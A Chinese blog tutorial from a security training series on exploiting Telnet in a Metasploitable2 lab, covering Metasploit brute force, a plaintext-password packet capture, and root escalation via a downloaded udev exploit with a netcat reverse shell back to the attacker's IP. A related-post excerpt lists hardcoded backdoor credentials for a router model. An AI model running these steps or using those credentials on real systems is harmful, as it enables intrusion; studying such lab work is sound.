4.6、漏洞利用-Telnet

最新推荐文章于 2023-08-19 22:48:59 发布
最新推荐文章于 2023-08-19 22:48:59 发布
阅读量2.9k 收藏 18
点赞数 3
分类专栏: 网络安全训练营 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwm_20211031_475/article/details/127040691
版权

目录

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

2、telnet版本介绍

3、telnet密码破解

4、telnet登录测试

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

2、Tenet明文密码传输

4.6.3、telnet登录提权

1、msf登录telnet

2、msf连接shell下载exp

3、设置kali nc监听

4、编译执行exp,获取root

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口

2、telnet版本介绍

攻击机kali:192.168.12.128

靶机metasploitable2:192.168.12.129

(1)使用nmap获取

nmap 192.168.12.129
nmap -p 23 -sV 192.168.12.129

6ffbd8190f63464396560be22c18709d.png8c10ad67d3da4c209daa311a22679d54.png

(2)使用metasploit

use auxiliary/scanner/telnet/telnet_version

show options

set rhosts IP

run

成功建立连接后可获得telnet的账号和密码

7c9f7e92fa1741c9bac40f6838ca1f6c.png991c6ea676a543f0a3339a0cd7c8f09b.pngf4585b296af9438794849a8c247b3604.png

3、telnet密码破解

search telnet

use auxiliary/scanner/telnet/telnet_login

show options

set rhosts IP
set user_file /路径
set pass_file /路径
//这里直接用msfadmin/msfadmin登录不再演示

run

50daeedf737740fc86bf3b65bf4543a7.pngc1cec720d23e424a8e85c5d27fc38c27.png8614e69165bc48e096e97a368b95e95b.png

4、telnet登录测试

使用破解好的会话连接telnet,并执行对应的命令

使用sessions -l 列举建立的会话

使用session -i id 使用对应的会话

5c5c269a67f74b9abebaf448fd501d2f.png2e106400c15c4a949f5064d4c7794030.png

5、获取meterpreter shell

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

Windows下开启Telnet客户端,连接telnet服务,默认下该服务关闭。

控制面板—>程序和功能—>telnet client

Dos命令框下使用telnet启动客户端,?命令查看帮助。

db559f2cf3674af08e08869c0abcbe39.png652244b7abaf4753846fad40e9259ab1.png5fdfdccd562e4bf6a05acc2714d5c93d.png

2、Tenet明文密码传输

Wireshark抓包分析

对比上述登录命令即可明显得出Telnet使用明文传输内容。

54a0439263964d0ca89310bb2fec8de9.pnge5c7294a1383484ca17533e79962f827.pngddbd70292d4d4f9481a7af2727932cc6.png

4.6.3、telnet登录提权

登录的目的在于提权,掌握系统root权限,具体流程

登录telnet服务
使用session -i连接bash shell
攻击机准备提权文件
通过bash shell将攻击机上的提权文件下载到靶机上
攻击机开启端口监听
在shell中执行,并定义反弹shell执行地址
连接shell,获得root权限

1、msf登录telnet

2、msf连接shell下载exp

攻击机准备提权文件
由于靶机无法直接下载exp,所有必须先将提权文件下载到kali中,修改文件名及后缀,开启kali的http服务,然后从连接的shell中将exp从kali中下载到靶机中。

值得注意的是默认的传输目录是/var/www/html/

另外,下载的exp文件需要在其末尾加入新行,不然后续执行的时候会报no newline的error。

service apache2 start    开启http服务

service apache2 status    查看http状态

cd /var/www/html/    切换到默认传输目录

wget http://www.exploit-db.com/download/8572    使用wget下载exp文件到kali

mv 8572 test.c    修改后缀名

msfadmin@metasploitable:~$ wget "http://192.168.12.128/test.c"
通过shell下载exp到靶机

3、设置kali nc监听

nc -lvp 6666
-l启动监听模式 
-v详细的分析内容
-p指定监听端口

4、编译执行exp,获取root

msfadmin@metasploitable:~$ gcc test.c -o exploit    编译C程序

msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run    定义执行环境至/run

msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 192.168.12.128 6666' >> /tmp/run

msfadmin@metasploitable:~$ cat /tmp/run    验证run配置

msfadmin@metasploitable:~$ ps aux | grep udev    查看pid

msfadmin@metasploitable:~$ ./exploit 2747    执行root权限id-1

 执行第一条命令的时候提示在tes.c文件的末尾没有newline,所有要在文件中添加以后再重新下载。

添加空行重新下载后继续。

id    权限id

whoami    我是谁

返回监听端口,结果表明提权成功

c10udy_
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Kali学习 | 漏洞利用:4.8 渗透攻击Telnet服务
qq_43233085的博客
01-11 4219
Kali学习 | 漏洞利用:4.8 渗透攻击Telnet服务Telnet介绍操作步骤 Telnet介绍 Telnet服务是一种“客户端/服务器”架构,在整个Telnet运行的流程架构中一定包括两个组件,分别是Telnet服务器和Telnet客户端。 由于Telnet是使用明文的方式传输数据的,所以并不安全。 这里就可以使用Metasplolit中的一个模块,可以破解出Telnet服务的用户名和密码...
opencv-contrib-python-4.6.0.66-cp36-abi3-win-amd64.whl
12-30
opencv_contrib_python-4.6.0.66-cp36-abi3-win_amd64.whl 资源
Telnet的攻击
uuty的专栏
10-18 2998
所谓对telnet的攻击也不外乎对telnet的用户猜解和对telnet服务进程的溢出,除了这些, 本人觉得telnet并没有太大的问题.telnet的连接并不是大家想象的那么简单了,虽然没有像ssh那样进行加密, 不过, 还是比ftp等通讯来的复杂。   D:>telnet 192.168.25.1 Red Hat Linux release 7.3 (Valhalla) Kernel 2.4.
漏洞利用-Telnet登录提权
guoyuxin3的博客
05-19 1014
msf登录telnet 在metasploit中使用 telnet_login进行登录,并使用sessions -i id 连接shell。 kali中启动metasploit 利用telnet_login模块连接(这里假设知道账号和密码 不知道的话可以爆破) 获得shell msf连接shell下载exp 使用 wget进行下载 wget http://www.exploit-db.com/download/8572 这里先是下载到了kali上 再利用靶机(此...
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 2953
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
Linux学习之Telnet明文漏洞
qq_42108074的博客
08-19 341
此文章为8月Day 19学习笔记,内容来源于极客时间。里边,鼠标右键点击第一条数据,然后选择。再打开在同一个内网的主机,然后使用。然后就看到了显示界面中的密码。,之后输入用户名和密码,注意。来监控端口,然后把数据传给。,把监听的信息保存到。
opencv_python-4.6.0.66-cp36-abi3-win32.whl
最新发布
03-01
该资源为opencv_python-4.6.0.66-cp36-abi3-win32.whl,欢迎下载使用哦!
opencv-python-headless-4.6.0.66-cp36-abi3-win-amd64.whl
12-21
opencv_python_headless-4.6.0.66-cp36-abi3-win_amd64.whl 下载官网:https://pypi.org/project/opencv-python-headless/4.6.0.66/#files
phpMyAdmin-4.6.5.1-all-languages
12-03
《phpMyAdmin-4.6.5.1-all-languages:多语言版本的数据库管理工具》 phpMyAdmin是一款广泛使用的开源Web应用,用于管理和控制MySQL数据库。在2016年12月3日,官方发布了4.6.5.1版本,此版本为all-languages版本,...
gradle-4.6-rc-1.zip
04-26
在“gradle-4.6-rc-1.zip”这个压缩包中,包含了Gradle 4.6 Release Candidate 1版本的相关文件。这一版本的发布通常意味着它是正式版发布前的最后一个测试版本,对功能和性能进行了大量的优化和修复,以确保稳定性...
漏洞讲解:远程开启Telnet
08-20
题目:漏洞讲解<br><br>一.远程开启Telnet<br><br>NTLM身份认证过程是:<br>1、客户端首先在本地加密自己的密码成为密码散列<br>2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输<br>3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge <br>4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response 。<br>5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器<br>6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。<br>7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功
Telnet攻击总结
01-10
通过详细的试验描述Telnet攻击,从实际环境出发,最大可能的还原真实环境
telnet 密码破解
05-06
可以对网络设备的telnet密码进行在线破解,适用于经常忘密码的网管。
基于telnet认证攻击的教程
04-23
有关telnet攻击的简单讲解,主要针对的2000和xp系统的NTLM认证的讲解
6-9漏洞利用-Telnet登陆提权
山兔的博客
07-16 519
使用弱口令登录之后,进行提权。
口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
薛定谔的猫
04-12 5471
用户可以通过输入用户名和密码来登录数据库服务器。输入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再输入go,可以发现ipconfig成功执行,获取目标操作系统的ip信息。开启kali-linux虚拟机,打开命令行窗口运行NMAP,输入命令nmap -v -A -Pn 193.168.1.24,对该IP地址进行扫描。在本机打开命令行,输入mysql -h 193.168.1.38 -u root –p,输入密码admin888,尝试登录mysql服务器。
宏电 H8922 Telnet后门漏洞(CVE-2021-28149)
孤桜懶契
04-06 1441
漏洞描述 i ⭐宏电 H8922 Telnet存在硬编码的账号密码 且默认开放 5188端口连接,可以以Root身份获取权限 漏洞影响 s ✅宏电 H8922 空间测绘 d ⭕ZoomEy:app:"Hongdian H8922 Industrial Router" 漏洞复现 搜索 ✅ Telnet连接目标5188端口,账号密码为 root/superzxmn ...
外网测试telnet&SSH漏洞案例分析
roostnew的博客
04-03 1872
I.问题现象 我司通讯管理机产品,现场要连接外网。安全测试中发现以下问题: II.问题分析 我司通讯管理机产品开通了telnet 以及SSH服务,主要用来远程调试/问题分析。 1、“Unencrypted Telnet Server ” Telnet使用的是明文传输,本身是不加密的,所以没办法关闭该漏洞。如果要避免这个问题,建议不使用telnet,改用ssh; Telnet 服务关闭命令如...
telnet攻击实战与简略防护方法
爱吃仡坨的Blog
08-07 1204
telnet爆破实验以及hydra工具的运用
opencv4.6 c++ Horn-Schunck 算法实现
05-31
Horn-Schunck算法是基于光流的算法,可以用于计算图像序列中物体的运动。下面是使用OpenCV 4.6和C++实现Horn-Schunck算法的代码示例: ```c++ #include <opencv2/opencv.hpp> #include <iostream> using namespace cv; using namespace std; int main() { // 读取两张图像 Mat img1 = imread("img1.png", 0); Mat img2 = imread("img2.png", 0); // 定义光流场的初始值 Mat flow(img1.size(), CV_32FC2, Scalar(0, 0)); // 设置算法的参数 double alpha = 1.0; // 光流场平滑度的权重 int iterations = 50; // 迭代次数 // 计算光流 calcOpticalFlowHS(img1, img2, flow, alpha, Size(8, 8), iterations); // 可视化光流场 Mat flow_vis; cvtColor(img1, flow_vis, COLOR_GRAY2BGR); drawOptFlowMap(flow, flow_vis, 16, Scalar(0, 255, 0)); // 显示结果 imshow("Optical flow", flow_vis); waitKey(0); return 0; } ``` 说明: 1. 首先读取两张灰度图像`img1`和`img2`,用于计算光流。 2. 然后定义一个大小和图像一样的光流场`flow`,并将其初始值设为0。 3. 接下来设置算法的参数,包括光流场平滑度的权重`alpha`和迭代次数`iterations`。 4. 最后调用`calcOpticalFlowHS`函数计算光流,将结果可视化后显示在屏幕上。 需要注意的是,Horn-Schunck算法的实现较为复杂,计算速度也较慢,对计算机的硬件性能有一定要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值